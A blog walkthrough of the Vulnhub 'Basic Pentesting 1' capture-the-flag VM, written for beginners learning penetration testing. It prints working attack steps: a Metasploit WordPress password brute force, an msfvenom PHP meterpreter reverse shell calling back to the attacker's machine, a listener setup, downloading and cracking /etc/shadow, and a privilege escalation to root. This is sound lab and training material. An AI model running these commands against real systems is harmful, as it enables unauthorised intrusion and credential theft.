Posted in Blog, CTF, Resources, Walkthrough

Basic Pentesting 1 (Vulnhub) Walkthrough

This was set up to be a VM for newcomers with multiples options. The goal is to obtain root. I started working on this one alongside the BSides Vancouver VM as an intro to pen testing. I found a walkthrough by Raj Chandel (http://www.hackingarticles.in/hack-the-basic-penetration-vm-boot2root-challenge/) that I used as a reference when I got stuck. Hopefully this will be detailed enough for a total beginner to work through this challenge and get started with penetration testing or capture the flag (CTF). Since I like to learn by doing, I’ve been looking at walkthroughs for some beginner level challenges to get an idea of what to do and look for.

Reconnaissance

Scanning and Penetration Testing

  • Fire things up, and run ifconfig to get my IP – 192.168.14.4
  • Scan the network using netdiscover -r 192.168.14.0/24

BPT1

  • Found 3 machines, now to figure out which is our target using nmap -A 192.168.14.0/24 (this option will give us ports and OS info). I copy/paste the full results into OneNote for reference, but I’ll keep this short in the interest of space.
    • 192.168.14.1: looks like a Windows machine of some sort, not my target, but has a few open ports
    • 192.168.14.2: all ports filtered
    • 192.168.14.3: Linux 3.2-4.8; here’s my target system
      • 21/tcp open ftp ProFTPD 1.3.3c
      • 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2
      • 80/tcp open http Apache httpd 2.4.18 (Ubuntu)
  • Check out 192.168.14.3 in a web browser…

BPT2

  • Now let’s probe the server using nikto -h 192.168.14.3

BPT3

  • This includes a /secret/ directory that “might be interesting”
  • Let’s check that out in the browser – it’s a WordPress blog

BPT4

 

  • Now we’ll try to login. We get a server not found message, and Raj’s reference walkthrough tells us we need to open the admin page using the domain name.
    • Go to /etc/ and find the hosts file.
    • Add [IP of target] vtcsec, save the file
    • Since we’re not connected to the internet, Kali doesn’t know how to reconcile the IP and server name (it can’t look up the DNS info), so we’re adding it.
    • Reference about the Linux host file: https://www.makeuseof.com/tag/modify-manage-hosts-file-linux/
  • Go refresh the browser page to see if it works.
  • It does, so now we’ve got a WP login screen.
  • Now we’ve got options, we can try a few easy default type usernames and passwords or try to find out more. Using WPScan could give use the usernames and info on vulnerabilities.
  • I’m going to check out the server in more detail to see what’s there. Since I’m trying to learn, I’m ok doing extra things. I use dirb http://192.168.14.3/secret to check out the directories on the server.
    • I didn’t see anything real exciting, but I filed the results for later.
  • I’d like to know what vulnerabilities I’m looking at, so let’s do a WPScan first.  # wpscan -u http://192.168.14.3/secret –enumerate u
    • 9 vulnerabilities from the version number
      • Authenticated JavaScript File upload
      • RSS and Atom Feed Escaping
      • HTML Language Attributes Escaping
      • ‘newbloguser’ Key Weak Hashing
      • MediaElement Cross-Site Scripting (XSS)
      • Application Denial of Service (DoS) (unpatched)
      • Remove localhost Default
      • Use Safe Redirect for Login
      • Escape Version in Generator Tag
    • Theme: twentyseventeen – v1.4
    • No plugins
    • User: admin
    • File the rest of the results for future reading…
  • I could brute force the password with WPScan, but I’ll follow our walkthrough’s guidance and use Metasploit.
  • Fire up Metasploit to brute force the password for ‘admin’
    •  msf> use auxiliary/scanner/http/wordpress_login_enum
    •  msf auxiliary(wordpress_login_enum) > set username admin
    •  msf auxiliary(wordpress_login_enum) > set pass_file /usr/share/wordlists/dirb/common.txt (could use whatever wordlist you want, make sure your file path is correct)
    •  msf auxiliary(wordpress_login_enum) > set targeturi /secret/
    •  msf auxiliary(wordpress_login_enum) > set rhosts 192.168.14.3
    •  msf auxiliary(wordpress_login_enum) > run (or exploit)
  • This worked and we get admin: admin
  • Go login and navigate to the template editor (Appearance – Editor) and then the 404 editor
  • We’ll try to replace the template following Raj’s directions.
    •  msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.14.4 lport=4444 -f raw (the host will be your IP)
    • Copy/paste the code from <? php to die(); and paste it into the 404 template.
    • Update the file
  • Setup a listener using Metasploit
    •  msf > use multi/handler
    •  msf exploit(handler) > set payload php/meterpreter/reverse_tcp
    •  msf exploit(handler) > set lhost 192.168.14.4
    •  msf exploit(handler) > set lport 4444
    •  msf exploit(handler) > run
  • Go to the template in the browser, and you should get a reverse shell. This hasn’t worked well for me, so now what?
  •  I tried creating a new page, calling it meta, and pasting in the php code. Opening that page didn’t get my listener, but it ended in /, let’s try changing that to .php
  • Success! The webpage hangs on connecting, and we get a reverse shell. You can close the web browser if you would like.
  • Let’s use sysinfo to see what we’re dealing with – nothing unexpected, it’s a Linux system.
  • Since Linux stores password info in /etc/, let’s see if we can access that by trying to download the shadow and passwd files.
    •  meterpreter > download /etc/shadow
    •  meterpreter > download /etc/passwd
  • Both downloaded, so we’ll follow Raj’s guidance to use John the Ripper to merge and crack the passwords. We have to go back to the regular terminal to do this.
    •  root@kali:~# unshadow passwd shadow > cracked (combines the two, but doesn’t show us anything)
    •  root@kali:~# john cracked
    • We get marlinspike (marlinspike) to indicate a user and password
  • Great, let’s login as marlinspike…back to meterpreter
  • Trying su – marlinspike gave an “unknown command: su” response. Ok, after some Googling, we need a shell.
    •  meterpreter > shell (since this is a Linux box, the shell will just give you a prompt)
    • Trying su -marlinspike again gets “su: must be run from a terminal”
    • More Googling tells me I need to get a TTY http://pentestmonkey.net/blog/post-exploitation-without-a-tty
    •  python -c ‘import pty; pty.spawn(“/bin/sh”)’
    • I now have a $, so that’s promising
    • Now I’m able to login as marlinspike using the su – marlinspike command
  • Back to Raj’s suggestions…I am able to check the sudo -l list and then use sudo bash to get root.

BPT5

  • Yay! Challenge complete. Now I want to try a different option. I’m not sure why the 404 change didn’t work – I tried it a bunch of times, and sometimes it would work if I cleared the browser cache and what not, but it wasn’t as reliable as I would like.
  • So I’ll try the Metasploit unix/webapp/wp_admin_shell_upload exploit I found working on the BSides Vancouver VM.
    •  msf > use exploit/unix/webapp/wp_admin_shell_upload
    •  msf exploit(unix/webapp/wp_admin_shell_upload)> set password admin
    •  msf exploit(unix/webapp/wp_admin_shell_upload)> set username admin
    •  msf exploit(unix/webapp/wp_admin_shell_upload)> set targeturi /secret/
    •  msf exploit(unix/webapp/wp_admin_shell_upload)> set rhost 192.168.14.3
    •  msf exploit(unix/webapp/wp_admin_shell_upload)> exploit
  • This got me my meterpreter shell, so let’s see if the same things work. I could download the passwd and shadow files, so I’ll try cracking them using John the Ripper again. This basically gave me the message that it had already done this, and there was not more cracking to be done. That makes sense since I didn’t clear things out before trying this alternative exploit. So I told john to show me the password – john –show cracked, and got my password again. Then I was able to follow the same procedures.(John the Ripper FAQ http://www.openwall.com/john/doc/FAQ.shtml)
  • Because I’m a curious person, I went back and deleted vtcsec from the hosts file to see if I could still use the Metasploit exploit. I was still able to open the reverse shell using the wp_admin_shell_upload, so that’s something to file away.

 

All in all, a fun challenge. It took me some time to get things figured out, but it gave me a great introduction to basic penetration testing and making sure my home virtual lab was working nicely. I was able to try out several different tools and had to troubleshoot enough that I wasn’t just following the walkthrough. However, a giant hat tip/thank you to Raj Chandel for his walkthrough.

Author:

Lifelong paradox - cyber sec enthusiast - loves to learn

3 thoughts on “Basic Pentesting 1 (Vulnhub) Walkthrough

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.